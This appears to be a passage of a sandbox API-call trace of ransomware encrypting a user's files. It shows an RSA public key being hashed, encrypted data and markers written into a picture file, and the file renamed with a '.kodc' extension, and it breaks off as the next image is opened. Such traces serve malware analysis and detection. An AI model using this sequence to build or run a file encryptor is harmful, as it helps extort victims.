(lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.230] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.230] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.230] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.231] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.231] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.231] GetLastError () returned 0x0 [0099.231] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.231] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.231] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.231] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.231] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xdb50) returned 0x9ba6d90 [0099.231] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dcc0 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ada8 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dd08 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adc0 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adf0 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae08 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.232] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adf0 | out: hHeap=0x630000) returned 1 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae08 | out: hHeap=0x630000) returned 1 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae08 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331adf0 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae08 | out: hHeap=0x630000) returned 1 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adf0 | out: hHeap=0x630000) returned 1 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.233] GetCurrentThreadId () returned 0x42c [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba4ec8 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.233] GetCurrentThreadId () returned 0x42c [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adf0 [0099.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae08 [0099.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331add8 [0099.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae20 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adf0 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adf0 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adf0 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae20 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae08 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331add8 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adc0 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9dd08 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.237] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xdb43, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xdb43, lpOverlapped=0x0) returned 1 [0099.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.237] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdb48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.237] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0099.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.238] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.238] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.238] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.238] CloseHandle (hObject=0x5cc) returned 1 [0099.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.239] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0yU28tc546iJ81.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0yu28tc546ij81.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0yU28tc546iJ81.jpg.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0yu28tc546ij81.jpg.kodc")) returned 1 [0099.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.241] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.242] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e43e10, ftCreationTime.dwHighDateTime=0x1d5be46, ftLastAccessTime.dwLowDateTime=0x6c0c3f60, ftLastAccessTime.dwHighDateTime=0x1d5bbbe, ftLastWriteTime.dwLowDateTime=0x6c0c3f60, ftLastWriteTime.dwHighDateTime=0x1d5bbbe, nFileSizeHigh=0x0, nFileSizeLow=0xd9aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4gJpk _7JzbYAnh6P1h.png", cAlternateFileName="4GJPK_~1.PNG")) returned 1 [0099.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4gJpk _7JzbYAnh6P1h.png") returned=".png" [0099.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4gJpk _7JzbYAnh6P1h.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4gjpk _7jzbyanh6p1h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.242] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=55722) returned 1 [0099.243] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.246] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd984, lpNewFilePointer=0x0, 